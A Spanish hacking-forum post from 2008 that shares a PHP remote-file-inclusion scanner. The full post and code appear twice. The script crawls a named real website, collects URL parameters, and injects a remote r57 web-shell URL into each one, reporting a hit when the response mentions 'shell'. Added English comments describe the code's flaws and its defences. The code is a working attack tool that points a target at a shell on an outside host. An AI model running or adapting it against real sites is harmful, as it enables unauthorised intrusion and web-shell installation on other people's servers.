alienmaster
04-10-2008, 13:47
Lo programé hace bastante tiempo; me había olvidado de él hasta ayer, que lo encontré y decidí publicar el código :P
Más información: http://www.elefren.com/blog/RFI-Scanner-en-PHP/
Saludos, elefrEn
<?
/*
RFI Scanner 1.0
Author: elefrEn
Website: http://elefren.com/
email: [email protected]
Dedicated to Spanish Hackers Team - http://spanish-hackers.com/
Gr33tz: -> JosS | nhh-32 | Omega <-
*/
# Removes PHP's execution time limit; the script issues one blocking HTTP
# request per candidate parameter, so its run time grows with the list.
set_time_limit(0);
#Config
# NOTE(review): all four values are hard-coded; nothing below validates them.
$urlweb = "www.guia-ubuntu.org";# Host to test, without the http:// scheme (e.g. google.com)
$urlshell = "http://usuarios.lycos.es/w0rms/r57.gif";# Remote URL placed into each tested parameter; rfi() looks for the word "shell" in the response
$comunvars = "cual|admindir|sec|id|file|doc|module|modulo|name";# "|"-separated parameter names always tested, in addition to those found by crawling
$filetoscan = "index.php";# Script on the host that receives the test requests
#Funcs
/**
 * Collects the query-string parameter names found in a URL.
 *
 * The URL's query component is split on "&", each piece is split on "=",
 * and the part before "=" is appended to the result with a leading "|".
 * Leftover "amp;" fragments (from HTML-encoded "&amp;" separators in the
 * scraped markup) are stripped from the result.
 *
 * @param string $url URL scraped from a fetched page (see extrac()), i.e. untrusted input.
 * @return string Names in the form "|name1|name2"; a URL without a query
 *                string still runs the loop once on an empty piece.
 */
function vars($url){
# NOTE(review): the bare word `query` is used as an array key, which relies on
# legacy constant-to-string fallback rather than a quoted string key.
$xpl = parse_url($url);$xpl = $xpl[query];$xpl = explode("&",$xpl);
$var = 0;
while($var < count($xpl)){
$v4r = explode("=",$xpl[$var]);
# $m0s is appended to without being initialised first.
$m0s .= '|'.$v4r[0];
$var++;
}
# Removes the "amp;" remainder so "&amp;name" contributes "name", not "amp;name".
$m0s = str_replace('amp;','',$m0s);
return $m0s;
}
/**
 * Filters a "|"-separated list, skipping empty entries and entries that
 * already match the output accumulated so far.
 *
 * @param string $list   "|"-separated entries.
 * @param bool   $barras When truthy, kept entries are joined with "|";
 *                       otherwise with "<br>".
 * @return string Kept entries, each followed by the separator, so a
 *                non-empty result ends with a trailing separator.
 */
function beerres($list, $barras = FALSE){
$s3p4 = '<br>';
if($barras) $s3p4 = '|';
$list = explode('|',$list);
$var = 0;
while($var < count($list)){
if($list[$var] != ''){
# NOTE(review): the entry is interpolated unescaped into a case-insensitive
# pattern and matched against the whole output string. This is a substring
# test, not an exact comparison (constructed example: "id" is skipped once
# "modid" has been kept), and any regex metacharacters in the entry are
# interpreted as pattern syntax. The entries originate from a remote page,
# and "@" hides the warnings a malformed pattern would raise.
if(!@preg_match("/$list[$var]/i",$m0s) ){
$m0s .= $list[$var].$s3p4;
}
}
$var++;
}
return $m0s;
}
/**
 * Fetches a page over HTTP and returns the parameter names used in its links.
 *
 * The page at "http://" . $n00b is downloaded with file(), anchor tags whose
 * href starts with $file are matched, and the query-string parameter names of
 * each href are gathered through vars() and de-duplicated through beerres().
 *
 * Everything read here is attacker-controllable from the point of view of
 * whoever runs the script: the names returned come straight from the remote
 * markup and are later placed into URLs and echoed into HTML.
 *
 * @param string      $n00b Host (and optional path) without the scheme.
 * @param string|bool $file href prefix to match. The only call in this file
 *                          omits it, so FALSE is interpolated as an empty
 *                          string and every href matches.
 * @return string "|"-separated parameter names with a trailing "|".
 */
function extrac($n00b, $file = FALSE){
$n0ob = 'http://'.$n00b;
# NOTE(review): call-time pass-by-reference (&$n0ob) is legacy syntax; the
# listing targets old PHP versions. The result of file() is not checked, so a
# failed fetch is passed on to join() as-is.
$source = join("",file(&$n0ob));
# $file is interpolated into the pattern without escaping. The match count
# stored in $vars is not used afterwards.
$vars = preg_match_all('/<a href="'.$file.'(.*)">(.*)<\/a>/i',$source,$results);
$t0t = count($results[1]);
$var = 0;
while($var < $t0t){
# The greedy capture can run past the closing quote of the href, so only the
# text before the first '"' is kept.
$xtr = explode('"',$results[1][$var]);
# $urllist is built but never read or returned.
$urllist .= $xtr[0].'|';
$varlist .= vars($xtr[0]);
$var++;
}
$m0s .= $varlist;
return beerres($m0s,1);
}
/**
 * Requests $web.$file once per parameter name, with the parameter set to
 * $urlshell followed by "?", and labels each URL from the response body.
 *
 * A response containing the word "shell" (case-insensitive) is labelled
 * "RFI->", anything else "Secure->". This is a plain substring heuristic:
 * any page that happens to contain that word is reported as a hit, and a
 * "Secure->" label is not evidence that the parameter is handled safely.
 *
 * Defensive relevance: each probe appears in the target's access log as a GET
 * whose parameter value is an absolute http:// URL ending in "?". The
 * condition being tested exists only where a request parameter reaches
 * include/require while remote URL includes are enabled (allow_url_include);
 * keeping that setting off and mapping parameters to an allowlist of local
 * files removes it.
 *
 * @param string $vars     "|"-separated parameter names; empty pieces are
 *                         not filtered out and are requested as well.
 * @param string $web      Base URL including scheme and trailing "/".
 * @param string $file     Script name appended to $web.
 * @param string $urlshell Remote URL used as the parameter value.
 * @return string HTML fragment with one labelled line per tested URL.
 */
function rfi($vars,$web,$file,$urlshell){
$list = explode('|',$vars);
$var = 0;
while($var < count($list)){
# Parameter names and the value are concatenated without URL-encoding.
$url = $web.$file."?".$list[$var]."=".$urlshell."?";
# NOTE(review): call-time pass-by-reference (&$url) is legacy syntax. The
# result of file() is not checked, so a failed request is passed to join()
# as-is.
$source = join("",file(&$url));
if(preg_match("/shell/i",$source)){
$m0s .= "<font color=red><b>RFI-></b></font> ";
}else{
$m0s .= "<font color=green><b>Secure-></b></font> ";
}
# NOTE(review): $url contains names scraped from the remote page and is added
# to the HTML report without htmlspecialchars(), so markup in a scraped name
# is rendered in the browser of whoever views the report.
$m0s .= $url.'<br>';
$var++;
}
return $m0s;
}
#Exec
# Crawls $urlweb for parameter names, appends the fixed $comunvars list (the
# crawl result ends with "|", so plain concatenation keeps the list
# well-formed), tests each name against $filetoscan and prints the report.
# The two lists are not de-duplicated against each other, and the report is
# echoed as raw HTML built partly from remote content.
echo rfi(extrac($urlweb).$comunvars,'http://'.$urlweb.'/',$filetoscan,$urlshell);
?>
Más información: http://www.elefren.com/blog/RFI-Scanner-en-PHP/
Saludos, elefrEn
<?
/*
RFI Scanner 1.0
Author: elefrEn
Website: http://elefren.com/
email: [email protected]
Dedicated to Spanish Hackers Team - http://spanish-hackers.com/
Gr33tz: -> JosS | nhh-32 | Omega <-
*/
# Removes PHP's execution time limit; the script issues one blocking HTTP
# request per candidate parameter, so its run time grows with the list.
set_time_limit(0);
#Config
# NOTE(review): all four values are hard-coded; nothing below validates them.
$urlweb = "www.guia-ubuntu.org";# Host to test, without the http:// scheme (e.g. google.com)
$urlshell = "http://usuarios.lycos.es/w0rms/r57.gif";# Remote URL placed into each tested parameter; rfi() looks for the word "shell" in the response
$comunvars = "cual|admindir|sec|id|file|doc|module|modulo|name";# "|"-separated parameter names always tested, in addition to those found by crawling
$filetoscan = "index.php";# Script on the host that receives the test requests
#Funcs
/**
 * Collects the query-string parameter names found in a URL.
 *
 * The URL's query component is split on "&", each piece is split on "=",
 * and the part before "=" is appended to the result with a leading "|".
 * Leftover "amp;" fragments (from HTML-encoded "&amp;" separators in the
 * scraped markup) are stripped from the result.
 *
 * @param string $url URL scraped from a fetched page (see extrac()), i.e. untrusted input.
 * @return string Names in the form "|name1|name2"; a URL without a query
 *                string still runs the loop once on an empty piece.
 */
function vars($url){
# NOTE(review): the bare word `query` is used as an array key, which relies on
# legacy constant-to-string fallback rather than a quoted string key.
$xpl = parse_url($url);$xpl = $xpl[query];$xpl = explode("&",$xpl);
$var = 0;
while($var < count($xpl)){
$v4r = explode("=",$xpl[$var]);
# $m0s is appended to without being initialised first.
$m0s .= '|'.$v4r[0];
$var++;
}
# Removes the "amp;" remainder so "&amp;name" contributes "name", not "amp;name".
$m0s = str_replace('amp;','',$m0s);
return $m0s;
}
/**
 * Filters a "|"-separated list, skipping empty entries and entries that
 * already match the output accumulated so far.
 *
 * @param string $list   "|"-separated entries.
 * @param bool   $barras When truthy, kept entries are joined with "|";
 *                       otherwise with "<br>".
 * @return string Kept entries, each followed by the separator, so a
 *                non-empty result ends with a trailing separator.
 */
function beerres($list, $barras = FALSE){
$s3p4 = '<br>';
if($barras) $s3p4 = '|';
$list = explode('|',$list);
$var = 0;
while($var < count($list)){
if($list[$var] != ''){
# NOTE(review): the entry is interpolated unescaped into a case-insensitive
# pattern and matched against the whole output string. This is a substring
# test, not an exact comparison (constructed example: "id" is skipped once
# "modid" has been kept), and any regex metacharacters in the entry are
# interpreted as pattern syntax. The entries originate from a remote page,
# and "@" hides the warnings a malformed pattern would raise.
if(!@preg_match("/$list[$var]/i",$m0s) ){
$m0s .= $list[$var].$s3p4;
}
}
$var++;
}
return $m0s;
}
/**
 * Fetches a page over HTTP and returns the parameter names used in its links.
 *
 * The page at "http://" . $n00b is downloaded with file(), anchor tags whose
 * href starts with $file are matched, and the query-string parameter names of
 * each href are gathered through vars() and de-duplicated through beerres().
 *
 * Everything read here is attacker-controllable from the point of view of
 * whoever runs the script: the names returned come straight from the remote
 * markup and are later placed into URLs and echoed into HTML.
 *
 * @param string      $n00b Host (and optional path) without the scheme.
 * @param string|bool $file href prefix to match. The only call in this file
 *                          omits it, so FALSE is interpolated as an empty
 *                          string and every href matches.
 * @return string "|"-separated parameter names with a trailing "|".
 */
function extrac($n00b, $file = FALSE){
$n0ob = 'http://'.$n00b;
# NOTE(review): call-time pass-by-reference (&$n0ob) is legacy syntax; the
# listing targets old PHP versions. The result of file() is not checked, so a
# failed fetch is passed on to join() as-is.
$source = join("",file(&$n0ob));
# $file is interpolated into the pattern without escaping. The match count
# stored in $vars is not used afterwards.
$vars = preg_match_all('/<a href="'.$file.'(.*)">(.*)<\/a>/i',$source,$results);
$t0t = count($results[1]);
$var = 0;
while($var < $t0t){
# The greedy capture can run past the closing quote of the href, so only the
# text before the first '"' is kept.
$xtr = explode('"',$results[1][$var]);
# $urllist is built but never read or returned.
$urllist .= $xtr[0].'|';
$varlist .= vars($xtr[0]);
$var++;
}
$m0s .= $varlist;
return beerres($m0s,1);
}
/**
 * Requests $web.$file once per parameter name, with the parameter set to
 * $urlshell followed by "?", and labels each URL from the response body.
 *
 * A response containing the word "shell" (case-insensitive) is labelled
 * "RFI->", anything else "Secure->". This is a plain substring heuristic:
 * any page that happens to contain that word is reported as a hit, and a
 * "Secure->" label is not evidence that the parameter is handled safely.
 *
 * Defensive relevance: each probe appears in the target's access log as a GET
 * whose parameter value is an absolute http:// URL ending in "?". The
 * condition being tested exists only where a request parameter reaches
 * include/require while remote URL includes are enabled (allow_url_include);
 * keeping that setting off and mapping parameters to an allowlist of local
 * files removes it.
 *
 * @param string $vars     "|"-separated parameter names; empty pieces are
 *                         not filtered out and are requested as well.
 * @param string $web      Base URL including scheme and trailing "/".
 * @param string $file     Script name appended to $web.
 * @param string $urlshell Remote URL used as the parameter value.
 * @return string HTML fragment with one labelled line per tested URL.
 */
function rfi($vars,$web,$file,$urlshell){
$list = explode('|',$vars);
$var = 0;
while($var < count($list)){
# Parameter names and the value are concatenated without URL-encoding.
$url = $web.$file."?".$list[$var]."=".$urlshell."?";
# NOTE(review): call-time pass-by-reference (&$url) is legacy syntax. The
# result of file() is not checked, so a failed request is passed to join()
# as-is.
$source = join("",file(&$url));
if(preg_match("/shell/i",$source)){
$m0s .= "<font color=red><b>RFI-></b></font> ";
}else{
$m0s .= "<font color=green><b>Secure-></b></font> ";
}
# NOTE(review): $url contains names scraped from the remote page and is added
# to the HTML report without htmlspecialchars(), so markup in a scraped name
# is rendered in the browser of whoever views the report.
$m0s .= $url.'<br>';
$var++;
}
return $m0s;
}
#Exec
# Crawls $urlweb for parameter names, appends the fixed $comunvars list (the
# crawl result ends with "|", so plain concatenation keeps the list
# well-formed), tests each name against $filetoscan and prints the report.
# The two lists are not de-duplicated against each other, and the report is
# echoed as raw HTML built partly from remote content.
echo rfi(extrac($urlweb).$comunvars,'http://'.$urlweb.'/',$filetoscan,$urlshell);
?>